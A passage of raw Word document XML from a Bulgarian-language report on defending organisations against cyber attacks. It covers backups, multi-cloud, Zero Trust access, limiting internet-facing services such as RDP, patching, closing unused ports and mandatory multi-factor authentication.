        <w:t>Препоръчително е и поддържането на резервен хардуер, който да бъде използван при нужда. Това позволява по-бързо възобновяване на дейността в случаите, когато възстановяването на основната инфраструктура е нежелано или невъзможно</w:t>
      </w:r>
      <w:r w:rsidR="007318EC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454E8FD3" w14:textId="139FFE6D" w:rsidR="00B63890" w:rsidRPr="00597AF3" w:rsidRDefault="00B63890" w:rsidP="002566EA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Използване на</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00597AF3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>multi-cloud solution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е подходящо, </w:t>
      </w:r>
      <w:r w:rsidR="002566EA">
        <w:t>защото</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> може да се съхранява важна информация или резервни копия на системата</w:t>
      </w:r>
      <w:r w:rsidR="00597AF3">
        <w:t>. Това добавя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> още един слой защита. </w:t>
      </w:r>
      <w:r w:rsidRPr="00597AF3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multi-cloud</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е препоръчителен, тъй като намалява риска от </w:t>
      </w:r>
      <w:r w:rsidRPr="00597AF3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vendor lock-in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или с други думи организацията не зависи само от един доставчик на </w:t>
      </w:r>
      <w:r w:rsidRPr="00A801E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cloud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00B63890">
        <w:t>В случай че всички акаунти или услуги при даден облачен доставчик бъдат компрометирани, наличието на резервна инфраструктура при алтернативен доставчик позволява по-бързо възстановяване на системите.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B67495B" w14:textId="30CE9D30" w:rsidR="00F01668" w:rsidRDefault="00F9169A" w:rsidP="002566EA">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00F9169A">
        <w:t xml:space="preserve">Една от ключовите мерки за защита е въвеждането на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F9169A">
        <w:t>Zero</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F9169A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F9169A">
        <w:t>Trust</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F9169A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F9169A">
        <w:t>Architecture</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F9169A">
        <w:t xml:space="preserve"> (ZTA), която не допуска неоторизиран достъп до данни и услуги</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006511F1">
        <w:t xml:space="preserve">Достъпът до данните трябва да бъде възможно най-гранулярен. Тоест </w:t>
      </w:r>
      <w:r w:rsidR="00F639D9">
        <w:t>необходимо е създаването на различни роли, които дават правомощия към определени данни и за определен срок. Така се избягва</w:t>
      </w:r>
      <w:r w:rsidR="002566EA">
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidR="00F639D9">
        <w:t xml:space="preserve"> проблеми, </w:t>
      </w:r>
      <w:r w:rsidR="002566EA">
        <w:t>при които</w:t>
      </w:r>
      <w:r w:rsidR="00F639D9">
        <w:t xml:space="preserve"> потребителите имат пълни правомощия към всяка една услуга. Свързването към частна мрежа не е достатъчно безопасно.</w:t>
      </w:r>
      <w:r w:rsidR="003A3653">
        <w:t xml:space="preserve"> Права се дават само при необходимост.</w:t>
      </w:r>
      <w:r w:rsidR="001A4310">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2024287078"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="6CC2363E" w14:textId="58D9CD5D" w:rsidR="00167428" w:rsidRPr="00F01668" w:rsidRDefault="00F01668" w:rsidP="00F01668">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F614CA8" w14:textId="14CF6E81" w:rsidR="003A3653" w:rsidRDefault="003A3653" w:rsidP="00167428">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc224154944"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Превенция </w:t>
      </w:r>
      <w:r w:rsidR="009B462B">
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidR="00B72237">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C7B38">
        <w:t>интернет-достъпни</w:t>
      </w:r>
      <w:r w:rsidR="00B72237" w:rsidRPr="00B72237">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F12CE">
        <w:t>уязвимости</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="03C95074" w14:textId="77777777" w:rsidR="00FB0DAF" w:rsidRDefault="00597AF3" w:rsidP="00CE6ED6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Употребата на</w:t>
      </w:r>
      <w:r w:rsidR="00E173D3">
        <w:t xml:space="preserve"> услуги като </w:t>
      </w:r>
      <w:r w:rsidR="00E173D3" w:rsidRPr="00597AF3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remote Desktop Protocol</w:t>
      </w:r>
      <w:r w:rsidR="00E173D3">
        <w:t xml:space="preserve"> в интернет</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е силно непрепоръчителна</w:t>
      </w:r>
      <w:r w:rsidR="00E173D3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00E173D3" w:rsidRPr="00597AF3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Remote Desktop</w:t>
      </w:r>
      <w:r w:rsidR="00E173D3">
        <w:t xml:space="preserve"> представлява свързване на даден потребител към отдалечена среда през интернет. Ако </w:t>
      </w:r>
      <w:r>
        <w:t>употребата на</w:t>
      </w:r>
      <w:r w:rsidR="00E173D3">
        <w:t xml:space="preserve"> услуга</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">та е наложително е </w:t>
      </w:r>
      <w:r w:rsidR="00E173D3">
        <w:t xml:space="preserve">важно да се вземат превантивни мерки към често срещани </w:t>
      </w:r>
      <w:r w:rsidR="00B72237">
        <w:t>първоначални векторни атаки</w:t>
      </w:r>
      <w:r w:rsidR="00382022">
        <w:t xml:space="preserve"> (фиг. </w:t>
      </w:r>
      <w:r w:rsidR="0049224F">
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00382022">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00B72237">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009D1559">
        <w:t xml:space="preserve"> Всички ненужни </w:t>
      </w:r>
      <w:r w:rsidR="009D1559" w:rsidRPr="00A801E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidR="009D1559">
        <w:t xml:space="preserve"> апликации и </w:t>
      </w:r>
      <w:r w:rsidR="003A5BBA">
        <w:t>мрежови</w:t>
      </w:r>
      <w:r w:rsidR="009D1559">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D1559">
        <w:t>протоколи трябва да са забравени.</w:t>
      </w:r>
      <w:r w:rsidR="006F7F4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EA0D33" w14:textId="37BDB4AE" w:rsidR="009D1559" w:rsidRDefault="009D1559" w:rsidP="00CE6ED6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Честа</w:t>
      </w:r>
      <w:r w:rsidR="006F7F4F">
        <w:t>та</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> проверка за уязвимости</w:t>
      </w:r>
      <w:r w:rsidR="006F7F4F">
        <w:t xml:space="preserve"> също е от ключово значение</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F9169A" w:rsidRPr="00F9169A">
        <w:t>Задължително е да се извършват редовни сканирания за уязвимости, като приоритет трябва да получат устройствата с директна връзка към интернет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007D2443" w14:textId="72F44EF9" w:rsidR="00A801E3" w:rsidRDefault="002C7B38" w:rsidP="00CE6ED6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Чести ъпдейти и пачове на софтуера и операционната система към последните налични версии е </w:t>
      </w:r>
      <w:r w:rsidR="00106AA8">
        <w:t>ключово</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Трябва да се приоритизира ъпдейти на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> свързани с </w:t>
      </w:r>
      <w:r w:rsidR="004D1EF8">
        <w:t>обработването</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на интернет данни – уеб </w:t>
      </w:r>
      <w:r w:rsidR="003D2F46">
        <w:t>браузери</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и плъгини. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0463E170" w14:textId="5C85BEF3" w:rsidR="002C7B38" w:rsidRDefault="00BF1F92" w:rsidP="00CE6ED6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Малкият и средният бизнес често има</w:t>
      </w:r>
      <w:r w:rsidR="008F16BC">
        <w:t>т</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> проблем с поддържка</w:t>
      </w:r>
      <w:r w:rsidR="00A801E3">
        <w:t>та</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на актуализациите, поради липсва на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r>
        <w:t>и</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A801E3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>maintenance</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A801E3">
        <w:t>отдел</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C36261">
        <w:t xml:space="preserve"> Едно решение е да се премине към </w:t>
      </w:r>
      <w:r w:rsidR="00C36261">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>managed cloud providers</w:t>
      </w:r>
      <w:r w:rsidR="00C36261">
        <w:t xml:space="preserve">, за да не се налага поддръжка на </w:t>
      </w:r>
      <w:r w:rsidR="00C36261">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exchange server</w:t>
      </w:r>
      <w:r w:rsidR="00C36261">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C36261">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> identity server </w:t>
      </w:r>
      <w:r w:rsidR="00C36261">
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00C36261">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mail gateway.</w:t>
      </w:r>
      <w:r w:rsidR="006E45EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="006E45EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>loud providers</w:t>
      </w:r>
      <w:r w:rsidR="006E45EB">
        <w:t xml:space="preserve"> следи</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t xml:space="preserve"> и</w:t>
      </w:r>
      <w:r w:rsidR="006E45EB">
        <w:t xml:space="preserve"> за уязвимости, пачва системи и има защити против </w:t>
      </w:r>
      <w:r w:rsidR="006E45EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DDOS</w:t>
      </w:r>
      <w:r w:rsidR="006E45EB">
        <w:t xml:space="preserve"> атаки</w:t>
      </w:r>
      <w:r w:rsidR="006E45EB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A428AFA" w14:textId="5D3AD179" w:rsidR="00B55AEF" w:rsidRPr="006E45EB" w:rsidRDefault="00AB4A2B" w:rsidP="00CE6ED6">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Всички</w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF" w:rsidRPr="00B55AEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on-premise</w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF" w:rsidRPr="00B55AEF">
        <w:t>, облачни, мобилни и лични</w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF">
        <w:t>устройства</w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF" w:rsidRPr="00B55AEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">трябва да </w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF" w:rsidRPr="00B55AEF">
        <w:t xml:space="preserve">са правилно конфигурирани и функциите за сигурност </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">да са </w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF" w:rsidRPr="00B55AEF">
        <w:t>актив</w:t>
      </w:r>
      <w:r>
        <w:t>ни</w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF" w:rsidRPr="00B55AEF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF">
        <w:t xml:space="preserve">еобходимо </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">е </w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF">
        <w:t>да се спрат всички портове и протоколи, които не се предназначени за бизнес употреба</w:t>
      </w:r>
      <w:r w:rsidR="005423C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="005423C2">
        <w:t>фиг. 9)</w:t>
      </w:r>
      <w:r w:rsidR="00B55AEF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001A4310">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1163192477"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:instrText xml:space="preserve"> CITATION Sto \l 1026 </w:instrText>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[1]</w:t>
          </w:r>
          <w:r w:rsidR="001A4310">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="2858CFEF" w14:textId="29EB33CC" w:rsidR="00A05FA6" w:rsidRDefault="00803A1A" w:rsidP="00803A1A">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="009D1559">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F2EDD25" wp14:editId="657B8091">
            <wp:extent cx="4513859" cy="1788228"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:docPr id="1256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6035" cy="1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D238" w14:textId="001FFAEF" w:rsidR="00A05FA6" w:rsidRDefault="00A05FA6" w:rsidP="00803A1A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc223382615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24</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>Д</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>иаграма</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>описваща</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>превенция</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> internet-facing vulnerabilities. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Експлоатация</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002F1D57">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>услуги</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="37EE82B5" w14:textId="54191F49" w:rsidR="00803A1A" w:rsidRPr="00803A1A" w:rsidRDefault="00803A1A" w:rsidP="00803A1A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005423C2">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62D222F0" wp14:editId="6B7B443B">
            <wp:extent cx="4536374" cy="1751644"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="38378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3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6544" cy="17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70A6" w14:textId="6F3009F5" w:rsidR="007B6A32" w:rsidRPr="00A05FA6" w:rsidRDefault="00A05FA6" w:rsidP="00A05FA6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc223382616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25</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Д</w:t>
      </w:r>
      <w:r w:rsidRPr="007C7776">
        <w:t xml:space="preserve">иаграма описваща превенция на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C7776">
        <w:t>internet-facing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C7776">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C7776">
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C7776">
        <w:t>. Ограничаване на достъпа</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="1E6A2D7D" w14:textId="76646D73" w:rsidR="00E173D3" w:rsidRPr="007B6A32" w:rsidRDefault="00FA1BAA" w:rsidP="007B6A32">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc224154945"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Компрометирани </w:t>
      </w:r>
      <w:r w:rsidR="00203DAB">
        <w:t>пароли</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="11AE2921" w14:textId="0162A1FD" w:rsidR="00E173D3" w:rsidRDefault="002579CD" w:rsidP="002579CD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Задължителна имплементация на</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B" w:rsidRPr="00AB4A2B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multi Factor Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4A2B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B" w:rsidRPr="00AB4A2B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB4A2B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MFA</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B" w:rsidRPr="00AB4A2B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> за всички услуги, особено имейли, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VPNs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и акаунти, които имат достъп до важни системи</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00FB6671">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB6671" w:rsidRPr="00FB6671">
        <w:t>При установяване на система, която не поддържа MFA, или потребители, които не го използват, е необходимо незабавно да се уведомят отговорните лица.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Съвременните </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">заменят процеса с двете пароли към </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t>автентикация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с пръстов отпечатък, лицево разпознаване, </w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PIN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на устройството или криптограф</w:t>
      </w:r>
      <w:r w:rsidR="00AB4A2B">
        <w:t>ски</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ключ. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090F2FC6" w14:textId="4F579C80" w:rsidR="002579CD" w:rsidRDefault="002579CD" w:rsidP="002579CD">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Имплементация на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
